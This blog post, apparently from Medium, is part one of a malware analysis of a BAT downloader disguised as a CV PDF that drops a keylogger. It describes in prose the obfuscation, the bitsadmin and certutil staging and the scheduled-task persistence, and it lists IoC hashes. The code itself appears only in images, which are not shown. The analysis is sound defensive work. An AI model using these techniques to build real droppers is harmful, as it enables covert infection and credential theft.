BAT Downloader to Keylogger Technical Analysis — Part 1

Recently I’ve encountered an interesting piece of malware, that used multiple techniques to obfuscate and drop files to disk. I thought it would be interesting to do a quick write-up / analysis on the sample and discuss some of the techniques used.

I’ll be splitting this analysis into two parts, this first one we’ll discuss the initial attack vector and how the malware installs and obfuscate itself into the machine. The second will focus on the two PowerShell scripts that the malware drops in its second stage.

Here are the hashes of the sample for anyone interested in taking a look:

Currently the sample has only 8/60 detection in VT

Image for post
Image for post

The Beginning

The malware was being distributed via a Dropbox link. Once downloaded we get a zip file named “CV_YASMINA.PDF .ZIP”.

The zip file uses a double extension to trick user into thinking it’s a PDF. This is a common technique for windows malware as the option to show file extensions is disabled by default.

The zip file contained one file with the “.bat” extension. Again the bat file used the double extension technique to trick users into thinking it’s a PDF file.

Image for post
Image for post

Let’s extract the bat file and take a look at the code inside.

Image for post
Image for post

As you can see the file seems to be obfuscated in some form and everything is written in what seems to be Chinese. But if we take a look at the encoding of the file with a command line tool like “file” we’ll see that its encoded in “UTF-16 LE”.

In VSCode for example we can choose the option to reopen the file with a different encoding. We’ll choose “UTF-8” and voila. The content of the malicious bat file is now readable.

Image for post
Image for post

Let’s start our analysis.

“CV_YASMINA.PDF .BAT” Analysis

The bat file is doing a couple of things to trick the user and download its next stage. Let’s go through the techniques used.

Image for post
Image for post

First the malware invokes the “Shows Desktop.lnk” file, which is used to minimize all windows and show the desktop. It’s the same as pressing the “Ctrl+M” keyboard shortcut.

It then invokes the “mshta” utility to pop an error message written in French that translates to “Unable to read the file. The file type may not be supported, the file extension is incorrect, or the file may be corrupted.” To trick the user into thinking that something has failed. (Below is the error message).

Image for post
Image for post

Next is the second stage downloader section. The file checks if the machine don’t contain a “test.bat” instance in the %temp% directory. If it doesn’t, it proceeds to create multiple variables from the letter “a” to “j”, each holding a small part of the full command that’ll download the second stage. All of this is used to avoid detection.

Image for post
Image for post

If we concatenate all of these variables, we’ll get the following string.

Image for post
Image for post

The code above performs the following action:

  • Create a folder named “WindowsNT” in the %temp% directory.
Image for post
Image for post
  • Start a download with the “bitsadmin” utility and download two files. The first is “launcher_kl.txt” which will get saved as “cert.exe” in the previously created directory “WindowsNT” and the second is “kl_exe.txt” which will get saved as “certificate_kl.txt” also in the “WindowsNT” directory.
Image for post
Image for post
  • Execute the freshly downloaded “cert.exe”.
Image for post
Image for post
  • Create a schedule task with the name “Update Manager” that’ll get executed every 10 minutes and will launch the “cert.exe” file.
Image for post
Image for post

All of this will be pushed to a file named “test.bat” that’ll get dropped in the %temp% directory and executed.

Image for post
Image for post

And just to make sure that the second stage downloader will get executed no matter what. A schedule task with the name “Update Manager” will be created to execute the “test.bat” file every 10 minutes.

Image for post
Image for post

Assuming that everything went as planned, and malware successfully downloaded everything. The next thing that’ll get executed is the freshly downloaded “cert.exe”. And that’s the file that we’ll be looking at next.

“cert.exe” Analysis

First we look at the result of the file command on our executable, we’ll see that it’s a PE32 executable with a GUI and the symbols are stripped.

Image for post
Image for post

Next, let’s check if it contains any interesting strings, by executing the “strings” command on it.

Image for post
Image for post

BINGO. As you can see the strings contains what look like a WMI command and some PowerShell. Let’s beautify this and put it into a nice editor and start analyzing.

Image for post
Image for post

In a nutshell the following code is decoding the previously downloaded “certificate_kl.txt” stored in the temp directory within the “WindowsNT” folder, using the “certutil” utility with “-decode” flag. Which is used to decode a base64-encoded file.

Image for post
Image for post

The decoded file is of type “Microsoft Cabinet archive data” or “CAB” file fort short (I.E: Compressed). The next thing the malware does is the decompression routine, which consist of using the “EXPAND” command.

Image for post
Image for post

The newly obtained PowerShell file is the final stage (Or so I thought) that contains a “Keylogger” written in C#. (That I’ll be analyzing in Part 2).

The final step before executing the PowerShell script is obfuscation. The malware author created a quick obfuscation routine to change the name of some of the functions inside the script. It uses simple replace methods and some randomization, to replace each function with a set of random characters.

Image for post
Image for post

Finally, the script gets executed and the original encoded file “certificate_kl.txt” is deleted.

Image for post
Image for post

Summary

Before we conclude this first part of our analysis, let’s do a quick recap on what the malware did and what techniques were used.

  • The malware hides itself as a PDF file inside a ZIP file with the name “CV_YASMINA” to trick the users into thinking that it’s an example of a CV (Curriculum Vita).
  • The ZIP file contains a malicious bat file that obfuscate its contents by using the UTF-16 LE encoding and multiple variables names to separate the commands being executed.
  • When executed its shows an error message to trick the users into thinking that something went wrong.
  • It downloads two files (“cert.exe” and certificate_kl.txt”) into the temp directory. Notice that the original files on the dropbox are with a “.txt” extension which add a small layer of obfuscation as “txt” file are sometimes ignored during analysis of logs.
  • It creates a two schedule tasks to make sure that the second stage will get downloaded and executed no matter what.
  • Once the second stage gets downloaded. The malware proceeds into the execution of “cert.exe” which will decode and create the “final” payload

Indicator of Compromise (IoCs)

CV_YASMINA.PDF .bat: dd42edae0008019aac47cee7962f564f1c201a232fe62f269b485e8e6332e498launcher_kl.txt / cert.exe: cf7fc1e176f3931bfbb508ddeb1b24b79f3db166ff1739cff69bee4d7f5d5a6akl_exe.txt / certificate_kl.txt:
1dd960fad2a8d057d32a9889e1f6a7c1349697d7df0fee2bc08d39709c443bd4
windows_activator.ps1 (After Obfuscation):
4a8f8f6053b1a43498c609599dfd2b491c957defede8a064194e6cf5de5c958d

Conclusion

I hope you enjoyed this quick analysis and learned something along the way. See you in part 2, hopefully very soon.

If you have any feedback or suggestions, please send them my way @nas_bench

Written by

#ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store